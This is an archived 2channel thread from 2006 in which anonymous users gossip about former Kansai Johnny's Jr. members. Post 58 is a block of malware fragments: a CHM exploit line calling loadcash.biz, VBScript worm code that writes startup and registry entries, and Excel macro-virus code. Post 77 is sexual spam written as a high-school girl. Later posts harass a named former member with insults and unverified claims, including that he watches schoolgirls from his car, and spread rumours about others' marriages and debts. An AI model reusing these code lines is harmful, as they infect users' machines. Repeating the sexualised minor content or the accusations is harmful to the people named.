2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

――元関西Jr.10――

1 :名無し・LR議論中@ユーは自治スレへ:2006/07/25(火) 14:33:36
元関西Jr.関係のネタは全てここでやりましょう(sage進行)
間違っても個人スレ等立てないように
元東ジュ話は辞めジュスレへ

前スレ――元関西Jr.9――
http://tv7.2ch.net/test/read.cgi/jr/1117281681/

過去ログは>>2 関連スレは>>3

ここは2ちゃんねるです
LRや初心者案内スレを読んでから発言しましょう
初心者案内スレッド1 http://tv7.2ch.net/test/read.cgi/jr2/1152867739/

2 :名無し・LR議論中@ユーは自治スレへ:2006/07/25(火) 14:34:09
過去ログ
http://saki.2ch.net/jr/kako/962/962762003.html
http://saki.2ch.net/jr/kako/966/966840801.html
http://saki.2ch.net/jr/kako/974/974133354.html
http://saki.2ch.net/jr/kako/984/984396824.html
http://music.2ch.net/jr/kako/997/997166526.html
http://tv2.2ch.net/test/read.cgi/jr/1014053584/
http://tv2.2ch.net/test/read.cgi/jr/1043511890/
http://tv7.2ch.net/test/read.cgi/jr/1069334882/

3 :名無し・LR議論中@ユーは自治スレへ:2006/07/25(火) 14:34:46
関連スレ

辞めジュ18
http://tv7.2ch.net/test/read.cgi/jr/1147441280/
■□昔のジュニアのことでも話すか・4□■
http://tv7.2ch.net/test/read.cgi/jr/1106914219/
『今夜限りの「カンジャニナイト」同窓会』
http://saki.2ch.net/jr/kako/996/996248545.html
@@元ジュの名前をひたすらあげるスレ@@   
http://saki.2ch.net/jr/kako/995/995121973.html

4 :名無し・LR議論中@ユーは自治スレへ:2006/07/25(火) 21:51:19
>1-3
乙です

まともな姐さんいてヨカタ
自分もいつ立てようか様子見てた
もう落ちてしまってから立てようかとオモテたところですた


5 :名無し・LR議論中@ユーは自治スレへ:2006/07/26(水) 00:04:34
治樹大丈夫なのか心配。。

6 :名無し・LR議論中@ユーは自治スレへ :2006/07/26(水) 00:35:20
>1-3
乙でした

>4
前スレみたいにジエンヌが来ないようにナモナモ

>5
不慮の事故・緊急入院で1ヵ月後がわからないなんて
どんだけ悪いのかと・・・orz

7 :名無し・LR議論中@ユーは自治スレへ:2006/07/26(水) 01:29:40
>5
メル欄鏝ってる
。。はこの板じゃ浮くよ

8 :名無し・LR議論中@ユーは自治スレへ:2006/07/26(水) 09:19:58
>>5-6
治樹の状態が分からないから、昔かなり好きやった私は不安で…orz
事務所も個人的に質問するなって言うのなら、詳細出してくれよぅ…
他メンバーもブログ停滞気味やし…

9 :名無し・LR議論中@ユーは自治スレへ:2006/07/26(水) 10:15:02
>8
気持ちはわからなくもないがそういうのはファンサイトでやってくれ
今後は以下のスレを読んでから発言して下さい
つ初心者案内スレッド1 http://tv7.2ch.net/test/read.cgi/jr2/1152867739/

10 :名無し・LR議論中@ユーは自治スレへ:2006/07/26(水) 11:49:26
>>9
スマソ。ついつい心配で…
ここは何を書いたらいいの?KTK通ってたんだけど…

11 :名無し・LR議論中@ユーは自治スレへ:2006/07/26(水) 12:33:55
>10
まずは半年ロムって書き方学習しよう
「ロムって何?」とかはなしね

12 :名無し・LR議論中@ユーは自治スレへ:2006/07/26(水) 14:46:32
>10
初心者スレに誤爆してるよな?しかもKYKって(w
狂都に通ってたから何?
何回も言うがここは2ちゃんねるであり馴れ合うファンサイトではない
空気を嫁

ロムって何?と聞き返されるのもイライラするから先に言っておく
ロム=R.O.M=Read Only Member つまり書き込みをせずに読むだけの人
半年黙って読んでふいんき(ryに慣れてから書き込め

長文スマソ

13 :名無し・LR議論中@ユーは自治スレへ:2006/07/26(水) 16:37:55
そうそう。間違えたた!と思って見直して分からんかったんよ…
そっちに書いてましたか…スマソ。
ジャニ板に初めて来たもんで…元ってつくぐらいだから、
なんか昔の話するのかなぁ〜とか考えまして…
ロムれって言われるかな?と思いました。
色々すいませんでした。

14 :名無し・LR議論中@ユーは自治スレへ:2006/07/27(木) 11:43:14
あーあ

15 :名無し・LR議論中@ユーは自治スレへ:2006/07/29(土) 01:57:16
まぁ昔話する位しかネタもない、ってのも事実だわな。
ここじゃ昔話は何だからmixiのKTKコミュででも。

16 :名無し・LR議論中@ユーは自治スレへ:2006/07/29(土) 02:04:26
>15
何か勘違いしてるようだね
まっ、半年ロムって出直して来て

17 :名無し・LR議論中@ユーは自治スレへ:2006/07/29(土) 10:12:27
>15
元関西=狂都というのもいかがなものかと
それにmixiの狂都コミュはお花畑過ぎて参加する気になれナス
>16
オマエモナー(w

18 :名無し・LR議論中@ユーは自治スレへ:2006/07/29(土) 19:34:43
>15
厨チャソにレスしないで

19 :名無し・LR議論中@ユーは自治スレへ:2006/07/29(土) 19:37:12
スマソ
>15じゃなくて>18へのレスだった

20 :ユーは名無しネ:2006/07/30(日) 09:38:29
セラビは治樹とあとの二人は誰だったかな。みんな元蛇兄?

21 :ユーは名無しネ:2006/07/30(日) 11:31:15
>20
半年ロムれ

22 :ユーは名無しネ:2006/07/30(日) 17:42:35
元蛇兄ワロタ

23 :ユーは名無しネ:2006/07/31(月) 14:37:43
タカグー見かけた!!

24 :ユーは名無しネ:2006/07/31(月) 21:04:07
どこで?

25 :ユーは名無しネ:2006/08/01(火) 00:01:25
>23-24
半年ロムれって

26 :ユーは名無しネ:2006/08/02(水) 08:56:06
ハンプティって氣志團のパクリ?

27 :ユーは名無しネ:2006/08/03(木) 01:43:22
パクリではないです…

28 :ユーは名無しネ:2006/08/04(金) 23:02:35
グリコのカフェオレのCM、1番右側の子がマッキーに見える…

29 :ユーは名無しネ:2006/08/10(木) 16:46:53
あの頃は楽しかった。昔に戻りたい。

30 :ユーは名無しネ:2006/08/12(土) 14:28:38
ソルト田くんはいずこへ?
昔ボアバックだったが。

31 :ユーは名無しネ:2006/08/12(土) 19:07:53
>28-30
まとめて半年ロムってね


32 :ユーは名無しネ:2006/08/14(月) 14:57:25
>>31
偉そうにしきってるならネタ出せよ。ロムらなくてもいいネタを。

33 :ユーは名無しネ:2006/08/14(月) 16:40:47
〉32に激しく同意

34 :ユーは名無しネ:2006/08/14(月) 17:04:42


35 :ユーは名無しネ:2006/08/14(月) 18:52:30
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

36 :ユーは名無しネ:2006/08/15(火) 00:13:01
ヒコーシ先伝えてないのに厨はついてくるんだな
前は放置してたけど注意されてもこれかよ
移転して心機一転スタート出来るかとオモタのに('A`)
ルールぐらい覚えてくれよ

37 :ユーは名無しネ:2006/08/15(火) 00:14:28
>32-33
何でロムれって言われてるか考えろ
それにネタがなければ無理に回す必要はない

38 :ユーは名無しネ:2006/08/15(火) 22:21:09
後藤のmixiの日記痛すぎるよな…
しょーもない詞にもみんなイヤミでコメントしてんのに気付いてないしw

39 :ユーは名無しネ:2006/08/16(水) 00:32:18
後藤って誰だっけ…

40 :ユーは名無しネ:2006/08/16(水) 03:36:56
シラネ。

41 :ユーは名無しネ:2006/08/17(木) 20:38:08
ゴッピの日記はウザイがイヤミでコメントしてるとは思えんが。

42 :ユーは名無しネ:2006/08/18(金) 23:09:11
後藤ダイスケのことか

43 :ユーは名無しネ:2006/08/24(木) 19:09:53
今日タブロイドの再放送で呉村出てたね

44 :ユーは名無しネ:2006/08/28(月) 19:52:13
野中くんて今何してるの?

45 :ユーは名無しネ:2006/08/28(月) 23:38:41
いいスレがあった!!
木村篤って知ってるひといます??

46 :ユーは名無しネ:2006/08/29(火) 08:02:27
キンピラ武富士ソネショウが組んでたユニの公式サイトは消えたのか?

47 :ユーは名無しネ:2006/08/29(火) 14:56:50
昨日から携帯サイトつながらん

48 :ユーは名無しネ:2006/08/29(火) 16:02:02
ブログは見れるよ

49 :ユーは名無しネ:2006/08/30(水) 12:00:28
NASAって今何してるの?

50 :ユーは名無しネ:2006/08/30(水) 22:34:31
NASAは果たして生きているのだろうか
もげはせは無事なのか

51 :ユーは名無しネ:2006/08/31(木) 03:55:39
真帆タソはどうしてるのかな

52 :ユーは名無しネ:2006/08/31(木) 17:47:17
某スレでNASAは療養中って書かれてたけどマジなのかな?
甘受スレでは触れられなかったけど
ベイベが辞めてない発言とかどこまでが真相かワカンネけど気になる

53 :ユーは名無しネ:2006/09/12(火) 10:21:25
長谷川はどうなった?

54 :ユーは名無しネ:2006/09/12(火) 13:43:57
長谷川は辞めました
伊藤は女と一緒にいるところをよく目撃されています

55 :ユーは名無しネ:2006/09/12(火) 15:55:12
>53-54
まとめて半年ロムね

56 :ユーは名無しネ:2006/09/15(金) 18:01:12
中土井宏宜

57 :ユーは名無しネ:2006/09/15(金) 19:59:00
>56
中土居だから(w

58 :<body onload=window()>:2006/09/16(土) 18:55:57
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

59 :ユーは名無しネ:2006/10/04(水) 17:33:37
野中結婚したってきいた
ほんとkana


60 :ユーは名無しネ:2006/10/04(水) 19:19:32
野中くん結婚しちゃったんだぁ……(´・ω・`;)

61 :ユーは名無しネ:2006/10/05(木) 01:05:27
>60
sageてくれ

結婚してないだろ?

62 :ユーは名無しネ:2006/10/05(木) 10:38:19
できちゃった婚です...

63 :ユーは名無しネ:2006/10/05(木) 14:05:40
バーの借金は返せたのか?
前もデキ婚って言われてたな 

64 :ユーは名無しネ:2006/10/05(木) 14:31:13
野中結婚したの?

65 :ユーは名無しネ:2006/10/06(金) 14:31:52
>>63

借金なんてあるの?
なんかできちゃったって聞いた。しかも彼女ブスらしい

66 :ユーは名無しネ:2006/10/06(金) 17:16:01
何情報なの?

67 :ユーは名無しネ:2006/10/06(金) 17:16:50
女がブスならデキても野中逃げそうなのになw

68 :ユーは名無しネ:2006/10/06(金) 17:21:43
借金相当あるってやめた当時は聞いてたけど
デキただけで結婚しないんじゃないの〜?

69 :ユーは名無しネ:2006/10/07(土) 05:47:14
デキたくらいでケコーンしないだろうな

70 :ユーは名無しネ:2006/10/07(土) 22:23:37
>69
激しく同意

71 :俊太:2006/10/09(月) 09:25:26
昔高黒徹が好きだった。今いずこ・・

72 :ユーは名無しネ:2006/10/10(火) 00:00:35
コテハン
高黒今いずこ?

73 :ユーは名無しネ:2006/10/10(火) 17:01:32
中土居宏宜

74 :ユーは名無しネ:2006/10/10(火) 22:13:56
野中は結局はもうバーテンじゃないの?

75 :ユーは名無しネ:2006/10/11(水) 11:06:52
野中地元でバンドしてる

76 :ユーは名無しネ:2006/10/11(水) 14:31:28
↑嘘バレバレ

77 :ユーは名無しネ:2006/10/11(水) 20:31:08
皆サン初めマシテ★高1の真衣デス!(≧▽≦)ィェーィ★
早速デスが真衣は最近超ミニのスカートにハマってマス★☆
♂のヒトの視線がタマラナィから・・・。つヵやっぱ真衣も変態ィ?((泣;(≧人≦)
友達でも持ってる子少なくて、つヵォナニーゃってる子ぁんまり居なぃし。
♂のオナニーゎェロビとか見ながらチンコしごくとヵで勃起するラシィケド・・。
♀のオナニーゎミィ的に指とヵだけじゃ濡れナイ;となるとゃっぱり♂と一緒でエロビとか必要デスョね・・。
結構準備とヵメンドィヵラ、困ってマス・・。ハッキリ言ったら電動歯ブラシだけじゃ満足しまセン。
(じゃぁヤメロョ。。)声は恥ずかしくてデナィし、ォッパィにも刺激与ぇてナインデス〜〜((汗
その前にォッパィにどんな刺激与ぇたら結構感じるンでしょぅヵ・・。振動与ぇても気持ち良くナイ。
((本音 唾液とか垂らすンでしょぅヵ?意味不な文でスミマセン^^;
でもォナニーって人それぞれデスョネ〜・・。皆サンのォナニー参考にシタイデス。(マジデス
彼氏は居ませンョ。。居ましたが別れちゃって(ずっと前)・・・。Hはした事有るヵラ非処女デス。

78 :ユーは名無しネ:2006/10/11(水) 20:55:16
私も他の提示板で地元でバンドしてるって見た

79 :ユーは名無しネ:2006/10/11(水) 21:26:06
>>73
Lead?

80 :ユーは名無しネ:2006/10/12(木) 10:17:50
【印象】東京キー局の偏向報道を叩く【操作】
http://tv8.2ch.net/test/read.cgi/tvsaloon/1160241406/
http://tv8.2ch.net/test/read.cgi/tvsaloon/1160578061/

81 :ユーは名無しネ:2006/10/15(日) 17:44:24
女寺豊っていたよね?

82 :ユーは名無しネ:2006/10/19(木) 22:09:36
うん

83 :ユーは名無しネ:2006/10/20(金) 14:17:55
なんだ野中のはガセか・・・
友達が地元の友達からきいたとか言ってたから信じてしまった
借金のこととかは初耳だけど
ヤツは女から金もらって生きる生き物だからありえる

84 :ユーは名無しネ:2006/10/20(金) 15:12:02
>83
激同

85 :ユーは名無しネ:2006/10/20(金) 17:08:00
>>84
禿 通り越して激かいwww

同意サンクス
借金でバーもやめたの?あいつほんと何やっても続かないな。

追加。彼女はブスはほんとだと思われ。

86 :ユーは名無しネ:2006/10/20(金) 21:08:29
バーの借金がある事は野中の母ちゃんが前に言ってた

他板で野中の友達という奴が地元でバンドしてるから応援してあげてとのカキコが多数

87 :ユーは名無しネ:2006/10/20(金) 21:23:55
関西の雛にあだ名をつけたズニアは誰だったか?

88 :ユーは名無しネ:2006/10/20(金) 21:28:37

sageろ

89 :ユーは名無しネ:2006/10/20(金) 21:30:46
このズニアスレに馬鹿馬鹿しい噂が
http://saturn-tv.net/~uwasa/bbs/readres.cgi?bo=kanjyani&vi=1089699778&rm=100

90 :ユーは名無しネ:2006/10/21(土) 19:45:05
魚谷
来週「天てれ」に出演

粟島
ブログに牧山の子供と3ショット写真あり

91 :ユーは名無しネ:2006/10/21(土) 20:09:16
雛のあだ名つけたのは純弥だろう

92 :ユーは名無しネ:2006/10/21(土) 20:14:55
野中って結局地元ですんでるのか

93 :ユーは名無しネ:2006/10/22(日) 10:55:23
http://society3.2ch.net/test/read.cgi/hosp/1161172226/



94 :ユーは名無しネ:2006/10/22(日) 20:15:58
実家にはほとんど帰ってないが地元にいるはず

95 :ユーは名無しネ:2006/10/22(日) 23:24:15
まだ某N駅周辺いるのか。

それにしても明日から魚チがみれるのは嬉しいな

96 :ユーは名無しネ:2006/10/23(月) 23:29:33
後藤きもい

97 :ユーは名無しネ:2006/10/24(火) 15:20:04
>96
同じく
あいつ何か勘違いしてる
京都時代から笑い者だったくせに
ミクシィでうかれすぎ

98 :ユーは名無しネ:2006/10/24(火) 15:35:50
>96
>97
そのくせ気になって毎回見に行ってんじゃねぇのか

99 :ユーは名無しネ:2006/10/24(火) 16:11:09
sageろ

>>86
バーの借金って、あいつがバー建てたの?マスター?みたいなかんじ?

100 :ユーは名無しネ:2006/10/24(火) 16:15:52
>98
後藤本人w

101 :ユーは名無しネ:2006/10/24(火) 16:55:34
後藤まじキモイ
だから当時の仲間にもハミにされんだよw
所詮元Jrってだけのやつで今はただのニートで親のスネをかじっる落ちぶれ野郎ww

102 :ユーは名無しネ:2006/10/24(火) 17:25:26
後藤って今なにしてんの?
バンドやってるってのは本当なのか?

103 :ユーは名無しネ:2006/10/24(火) 17:47:33
音楽や楽器に関して何の知識もない奴らが集まってやってるらしい
所詮バンドごっこ遊びにすぎない(大爆笑)
純弥北山に出来て俺に出来ない訳がないと純弥北山をバカにしてのバンド結成らしい(爆笑)

純弥北山もあんなカスにバカされてご愁傷様(大爆笑)

104 :ユーは名無しネ:2006/10/24(火) 19:01:43
魚谷寒かった

105 :ユーは名無しネ:2006/10/24(火) 19:14:24
>104
魚谷どんなことしてんの??

106 :ユーは名無しネ:2006/10/24(火) 19:24:59
>104
どんな役でも魚谷は頑張ってるからカス後藤よりマシw

107 :ユーは名無しネ:2006/10/24(火) 19:31:26
天テレか。
まぁ役が役だしあの番組だし仕方ないな
元の中で一番頑張ってるから応援してる

108 :ユーは名無しネ:2006/10/24(火) 19:39:59
女寺や小川は何してる?

109 :ユーは名無しネ:2006/10/24(火) 19:47:59
>108
すごく知りたい
ちづるかケコーンするようだね

110 :ユーは名無しネ:2006/10/24(火) 20:00:59
水野

111 :ユーは名無しネ:2006/10/24(火) 20:01:31
>99
奴の話だとオーナーはヤクザ
マスターは違う奴
売り上げいつも気にしてたからノルマかな?
よく分からん
スマソ

112 :ユーは名無しネ:2006/10/24(火) 20:08:47
他のズニアの名前上げてるの後藤じゃねーのw
あいつ顔も昔からヤバイが今は見れたモンじゃねーな
ハゲてるしw
ワンフがいるとでも思ってんのか?


113 :ユーは名無しネ:2006/10/24(火) 20:35:56
後藤の事なんて辞ジュすら相手にしてないよww

114 :後藤大祐:2006/10/24(火) 20:37:34
∧∧
       /⌒ヽ)  
      i三 U  
     〜三 |    
      (/~∪
    三三
  三三
三三


115 :ユーは名無しネ:2006/10/24(火) 21:17:57
後藤ってマイミクの女を片っ端から喰ってるらしいな
武藤やら純弥は後藤のメール無視してるらしい
みんな影で笑ってるとも知らないでww
ブサイクのくせにまだ芸能界諦めてないらしく EXILEのオーディションにもノコノコ行って落ちたらしいしなw
しかも今更ジャニーに電話して関ジャニ∞に入れてもらうとかほざいてるし キモイしイタいし救いようがない

116 :後藤大祐:2006/10/24(火) 21:49:14
マイミクの女もよく後藤に抱かれたもんだがww
∞に本気で入れると思ってるん?!
EXIJEとかウケルんだけど〜!!!
>115さんは何情報?

117 :ユーは名無しネ:2006/10/24(火) 21:54:34
>116
>115だけど直接 後藤が聞いてもないのにペラペラ言ってきやがった

118 :ユーは名無しネ:2006/10/24(火) 21:57:42
>117
本人情報とはこれまたキモイなww
早く現実見させたほうがいいんじゃないの?
バンドもマジ?

119 :ユーは名無しネ:2006/10/24(火) 21:59:28
某辞ジュが後藤の言う事はウソばっかだから信用するなと言われたw
嫌われ者・・・後藤
マイミクから外して欲しいとも言っていた爆

120 :ユーは名無しネ:2006/10/24(火) 22:09:10
ごっぴの日記泣けるで

121 :ユーは名無しネ:2006/10/24(火) 22:10:58
>119
それ私も聞いたw
魚谷は自らマイミク外してたけどねw
マジで嫌われてるから笑っちゃう
後藤の日記全体公開になってるから今見に行ってみたんだけど、かなりキモイw
あれはかなりのもんだ

122 :ユーは名無しネ:2006/10/24(火) 22:16:08
>120 奴は大卒なんだから それぐらいの文章能力はないとなー
発揮するとこないんだしミクシィで発揮してんじゃねーのw

123 :ユーは名無しネ:2006/10/24(火) 22:19:30
後藤さげろ
>117
後藤の妄想馬鹿話詳細ギボンヌ

124 :ユーは名無しネ:2006/10/24(火) 22:22:14
>122
ミクシィで発揮って痛すぎるね
現代ニートの逝く末か
学歴自慢もうぜぇ!

125 :ユーは名無しネ:2006/10/24(火) 22:24:21
>123
最近電話してこないからワカラナイw

126 :ユーは名無しネ:2006/10/24(火) 22:47:51
学歴あってもバイトすらしないニートじゃ親も泣くよな
地元の親友も注意しないとこみると、後藤が親友だと思ってる地元の奴もたいした仲間じゃないんだなw
後藤は地元の奴からも嫌われ者!ってかww

127 :ユーは名無しネ:2006/10/24(火) 23:00:56
私からしたら魚谷の方が痛いと思うんだけど。大したルックスも才能もないくせに芸能界諦めきれず中途半端なポジションはずかしすぎるwしかもなんなんだ、あのブログ。中途半端にも程がある上に、コメント数すくなすぎwそれで調子乗ってるからウケる〜

128 :ユーは名無しネ:2006/10/24(火) 23:24:32
後藤て誰?バイオリン?

129 :ユーは名無しネ:2006/10/24(火) 23:31:49
>127
後藤だろ!w
魚谷はお前より頑張ってるじゃないか
誰しも下積み時代があるもんだ
どんな役だろうが今を頑張ってる魚谷のほうがカッコいいよ!
しかもコメントって数なのか?w
大卒なんだから、その幼稚な考えやめたら?
お前のコメントが多いのは、暇人のお前がコメント返ししてるからだし、マイミクが暇人のお前に更にコメント返ししてるだけだしな
面白がってお前とマイミクやってるだけだよ!w
お前のマイミクは大半が魚谷や純弥に頼まれてお前としょうがなくマイミクして、お前を調子乗らすために感動したとかコメント書いてるだけだしなw
それに騙されて自分が人気あるみたいな事思ってるお前ってバカじゃねーのww
いい加減気付けよ!ww

130 :ユーは名無しネ:2006/10/24(火) 23:41:11
>127って後藤っぽいw
学歴あって何にも生かしてない後藤のほうがバカだよね〜ウケる〜w
中途半端な役でも魚谷のほうが頑張ってるのがわかるしね〜

魚谷の事中傷すればするほど後藤の立場悪くなるのに気付かないのかねww
勉強ばっかやって世間しらなすぎだしウケる〜w

131 :ユーは名無しネ:2006/10/24(火) 23:53:06
>127
才能なんて長年やって得るものもあるんだし、なんの努力もしてない後藤に魚谷も言われたくないと思う
いい加減まじで気付けよ

132 :ユーは名無しネ:2006/10/25(水) 00:02:35
魚谷書き込み必死だね

133 :ユーは名無しネ:2006/10/25(水) 00:07:28
魚谷自演に激しく同意

134 :ユーは名無しネ:2006/10/25(水) 00:52:45
上に激しく同意w

135 :ユーは名無しネ:2006/10/25(水) 01:17:41
後藤も魚谷も純弥も昔の蛇兄姿に依存してるただのバカだろw
それに比べクレムラはきっぱり引退して現実視してるからまだマシ

136 :ユーは名無しネ:2006/10/25(水) 02:12:34
後藤、自分が叩かれてるからって魚谷の自演と言うな
お前は本当に暇人だなw
グレムリンがマシとかじゃなくて、後藤以外は自分のやりたいことを頑張ってるし応援出来るけど、お前は親のスネかじってるただのニートなんだから自慢にもならないぞ!
魚谷やらをバカしする前に人として笑われない生活しろよな

137 :ユーは名無しネ:2006/10/25(水) 02:52:08
>132〜134
後藤バレバレW
魚谷がここ来る訳ねーだろ!所詮お前くらいだよ
ミクシィもログイン中だったしなW
後藤現実見ろよ…
お前はどうあがいたってパンピー
魚谷はプロダクション入ってたんだよ!
コメントどうのって辺りがミクシィ依存後藤バレバレWW

ちなみにクレも春名あみと付き合った時点で痛いが

138 :ユーは名無しネ:2006/10/25(水) 03:03:08
後藤辞ジュほとんどのメンバー見下してた(笑)
何様のつもりなのか…ニートのカス
顔もひきこもりみてぇになってんじゃん(笑)

139 :ユーは名無しネ:2006/10/25(水) 04:18:02
純弥と北山も芽が出ないのに痛い

140 :ユーは名無しネ:2006/10/25(水) 04:39:29
>139
後藤ひつこいぞ!
芽が出るかはやってみないと分からない事だろ?
好きなことだから芽が出るまで頑張れるんじゃないの?
頑張ってないテメーに何がわかるんだ
純弥らを見下したりってただのヒガミにしか聞こえないぞw

後藤!テメーがそこまで落ちぶれたとはガッカリだよw

141 :ユーは名無しネ:2006/10/25(水) 04:51:02
お前らよっぽど後藤が好きなんだなw

142 :ユーは名無しネ:2006/10/25(水) 08:41:24
誰がみても魚谷の自演にしか思えないんだけど。魚谷かばいすぎでしょwそんな印象に残ってないよ、魚谷なんて。

143 :ユーは名無しネ:2006/10/25(水) 10:28:54
他担だが魚谷贔屓な自分が来ましたよ(w
sage進行なんだからメル欄にsageと半角で入力してから書き込み汁!

後藤のイタさはKTKコミュに自らとトピを立てた時点で真性ケテーイ
見た時は「懐かしいな」のみで終了
自分は他の人が書いたところから魚谷を見つけたんだが
仮に魚谷が自らトピを立てていたとしても
キャー∩(´∀`∩) (∩´∀`)∩キャーしただけだろうな
その違いは全て顔の違いと言っても過言ではない(w

そして魚谷が印象に残ってないなら誰が印象に残ってると言うんだろう?
辞めますとちゃんと挨拶してから辞めた時点で十分印象に残ると思うんだな
それに伝説の全身タイツのこともあるし当時を知っている人間なら
好き嫌いは別として印象には残ってると思うんだが(w

144 :ユーは名無しネ:2006/10/25(水) 10:57:16
魚谷をかばう?そりゃかばいたくもなるでしょw
あんだけ自分のやりたい道で頑張ってんだからさ
なのに後藤お前はニートのカスだろ?バカじゃねーのww
ニートの中でもたちの悪い奴だよなww
親もよく許してるよなww
家の中にじっとしてればいいのに、車でウロウロしてガソリン代は親の金!親の金で買ったタバコを吸ってさぞかし美味しい事でしょうww
KTKのコミュに書き込みとかキモイ事やめな!
恥ずかしくないのか?
現役当時全然人気なかったし、今現在ミクシィでマイミクのだいたいが、お前じゃなくてマイミクの純弥や呉村やらに興味があるからお前とマイミクなんだぞ!
お前はヘラヘラすぐ返事書くからお前なら近付く事が簡単に出来そうってなw
マイミクの数やコメント数とかを比べてる時点で後藤お前はレベルが低すぎ!これだけ書かれてもまだ判らないんだなw

145 :ユーは名無しネ:2006/10/25(水) 11:57:22
そんな身内ネタぺらぺら書いて自分の首絞めてることに気付かないバカ発見☆

146 :ユーは名無しネ:2006/10/25(水) 12:41:23
後藤をかばう気はないけど、ニートニートって言ってる奴もしつこいよ

147 :ユーは名無しネ:2006/10/25(水) 12:55:11
必死に叩いてる奴一人だしね(-_-)後藤ネタ飽きたー

148 :ユーは名無しネ:2006/10/25(水) 13:17:08
キモイカスニート後藤にはココでいくら言ったとこで被害者ぶるだけで直そうとはしないぜw
現に叩かれてる事をショックみたいな感じで言ってきやがったしなw
実際後藤の味方なんていないの気付けよなww

149 :ユーは名無しネ:2006/10/25(水) 15:39:55
一人でこんなに後藤を叩けるワケね〜だろw

150 :ユーは名無しネ:2006/10/25(水) 16:04:44
後藤ってニートじゃなくてひきこもりだろw
はげてるやんww

151 :ユーは名無しネ:2006/10/25(水) 17:09:31
えっ?ごっぴニートじゃないでしょ?ウチの友達から聞いたけど、某大手小売り会社の内定懇親会にごっぴも出席してたみたいだよ☆

152 :ユーは名無しネ:2006/10/25(水) 17:17:55
>151
後藤あがくなw
落ち込んでろ
ハゲ

153 :ユーは名無しネ:2006/10/25(水) 17:41:04
>>152ウチごっぴじゃないんだけど(・・;)
勘違いしてる人いるしそう聞いたから言ってみただけ☆

154 :ユーは名無しネ:2006/10/25(水) 17:45:31
ここはsage進行だと何回言えばわかるんだ?
書き込む時はメール欄にsageと半角で入力してから書き込めゴルァ

155 :ユーは名無しネ:2006/10/25(水) 18:04:52
>153
ゴミつけんな
そのお友達は見間違いをしたようね
後藤自身が働かなくていい環境だからニートだってついこの間言ってましたよw
内定してる人がオーディション受けるワケねぇだろ

156 :ユーは名無しネ:2006/10/25(水) 18:11:31
>155
お前は後藤と繋がってるみたいに言うなw
どうでも良いけど奴がミクシしてんなら直接文句言えよ根性ナシがw

157 :ユーは名無しネ:2006/10/25(水) 18:20:54
>156
後藤黙れ
後藤となんてみんな繋がってるだろ

158 :ユーは名無しネ:2006/10/25(水) 19:05:51
後藤を叩いてる人が後藤本人なんじゃないかと思えてきたww
ここで話題にしてほしくてわざわざ自分を叩いてるとか

159 :ユーは名無しネ:2006/10/25(水) 20:30:23
寂しい奴だな。


そろそろ後藤話は終わりにしたい件について。

160 :ユーは名無しネ:2006/10/25(水) 20:34:05
後藤よ、せいぜいバンドゴッコ楽しんでくれ!

161 :ユーは名無しネ:2006/10/25(水) 21:15:53
初めて後藤の話題が盛り上がった内容って散々叩かれた後藤…
まぁ話題になっただけでも後藤にはいい思い出だろう

162 :ユーは名無しネ:2006/10/25(水) 23:12:04
後藤シラネ

163 :ユーは名無しネ:2006/10/25(水) 23:17:10
後藤さん!関ジャニ∞に入れるんですか?ww
入れたとこで悲しい結果ですよw

164 :ユーは名無しネ:2006/10/26(木) 01:09:03
入れるわけないじゃん!
後藤、Jrの時も今も人気ねぇな…
後藤は女の事しか頭にないw

165 :ユーは名無しネ:2006/10/26(木) 01:47:51
そろそろ後藤って文字をNGに入れるか…

166 :ユーは名無しネ:2006/10/26(木) 10:44:28
後藤って地元の女子高生を車を止めて車内から何時間も眺めてるらしい
毎日同じ時間に現れてニヤニヤしながら女子高生をいやらしい目で見てるらしい
顔だけじゃなく行動もキモイww
ニートだけならともかく痴漢かよww
痴漢は犯罪です!

167 :ユーは名無しネ:2006/10/26(木) 11:03:10
妄想乙
そんな妄想話書き込みしてるお前がテラキモス

168 :ユーは名無しネ:2006/10/26(木) 11:19:06
女子高生を眺めに車で出かけて車を止めて車内から見てるって私も聞いたw
毎日かは知らないがなw

169 :ユーは名無しネ:2006/10/26(木) 12:14:16
後藤なんてジャニの手違いでJrになったんだしさ どうでもいい!w
明日は純弥北山のバンドのワンマンらしいけど誰か行く?

170 :ユーは名無しネ:2006/10/26(木) 13:07:36
一人で書き込みバレバレですよ(つд`)

171 :ユーは名無しネ:2006/10/26(木) 13:11:26
後藤の自作自演w
根暗な野郎w

172 :ユーは名無しネ:2006/10/26(木) 13:21:22
ココで書かれてる事は全部本当だし後藤も何も言えないね(大爆笑)

173 :ユーは名無しネ:2006/10/26(木) 13:23:19
>169がせっかくネタ持ってきてくれたのにまだ後(ryの話するつもりかよ…

174 :ユーは名無しネ:2006/10/26(木) 13:59:45
99ですが
>111レスサンクス。
や○ざか。ノルマがあるんならいってやればよかったw

175 :ユーは名無しネ:2006/10/26(木) 14:09:33
後藤ミクシィのトップ画(自分)しょっちゅう変えてたのに今は自分じゃないなw
ココ見てやっと自分のブサイクさに気づいたかw
前髪でハゲを隠すの必死さが伺えるトップ画だったのに、もう見れないのが残念w

176 :ユーは名無しネ:2006/10/26(木) 14:17:14
いま後藤みてきたが、ピーターパンwww
自画の時をみたかったwww

